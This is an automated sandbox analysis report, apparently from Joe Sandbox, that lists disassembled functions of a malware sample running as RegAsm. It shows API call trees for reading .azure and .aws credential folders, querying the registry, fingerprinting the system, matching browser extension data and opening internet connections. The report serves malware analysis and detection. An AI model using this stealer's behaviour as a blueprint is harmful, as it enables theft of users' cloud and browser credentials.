                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                                  • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,004265BB,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                                  • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                  • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                                  • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                                  • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                  • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                  • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                  • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                  • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                                  • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                  • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                  • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                                  • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                  • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                                  • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                  • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                  • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                  • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                                  • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                  • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                  • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                                  • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                                  • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426570,?,?,?,?,00416EC0), ref: 00411821
                                                                                  • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                                  • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                                  • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                                  • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                  • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                                  • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                  • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                  • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                                • String ID: 5A&6A
                                                                                • API String ID: 1955031769-2983527881
                                                                                • Opcode ID: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                • Instruction ID: edbb1815c7422c7d311f49e837a4d97797ab122b1f4c92a9abc43992aef21044
                                                                                • Opcode Fuzzy Hash: f56475e3e9353e3f899919c66131b9dca8b7c1d3b1fcd2b89d564be33ac666e9
                                                                                • Instruction Fuzzy Hash: 8C4242B1D00358AADF10EBE5C946BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                                Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00406190
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3869837436-0
                                                                                • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                Function 0040FF81 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                • wsprintfA.USER32 ref: 0040FFDC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                • String ID: %d MB$@
                                                                                • API String ID: 3644086013-3474575989
                                                                                • Opcode ID: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                • Instruction ID: ca080bb329355c7b2013afa2bdf3b2efff8528aa9c5ce76f1778211d5c0869c6
                                                                                • Opcode Fuzzy Hash: d58cec7bb25a44c408c3687956696a67a71d0eb3ae1938313e2b8797632a6eaa
                                                                                • Instruction Fuzzy Hash: 8AF036B5A00218ABE7149BA4DC4AF7E76BEEB45705F400039F702E61C0D7B4D8058769
                                                                                Function 00415CA5 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415CAA
                                                                                • memset.MSVCRT ref: 00415CD6
                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                                • lstrcat.KERNEL32(?), ref: 00415D55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                • String ID:
                                                                                • API String ID: 2333602472-0
                                                                                • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                                • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                                • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                                Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                  • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                  • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                  • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                  • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426B18,?,00000000,004265C7), ref: 004172F1
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                • ExitProcess.KERNEL32 ref: 0041731C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                • String ID:
                                                                                • API String ID: 1043047581-0
                                                                                • Opcode ID: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                • Instruction ID: d94f923eae08acc0ec9c25e643b9a8e0192b3615959a138ccc40586fc2a64efe
                                                                                • Opcode Fuzzy Hash: 113881885c3839af2b79a56db40bcd2305469b038b667f9b69e4ccdc7c5ab35c
                                                                                • Instruction Fuzzy Hash: 38113D71900019BBCB11FBE2DD6ADEEB77DAE55304B50007EF502B24E1DF386A09CA69
                                                                                Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00403A59
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CrackH_prologInternetlstrlen
                                                                                • String ID:
                                                                                • API String ID: 503950642-0
                                                                                • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                                • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                                • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                                Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2A6
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                • API String ID: 2813378046-3310892237
                                                                                • Opcode ID: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                • Instruction ID: bb3a9efdf4450b2767142494be26f7b0dc10ed47a6f8b455ca68a0d11c56a3c9
                                                                                • Opcode Fuzzy Hash: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
                                                                                • Instruction Fuzzy Hash: B2715C70905288AADB14FBE5D916BDDBBB4AF19308F50417EE805736C2DB78170CCBA6
                                                                                Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004064EA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
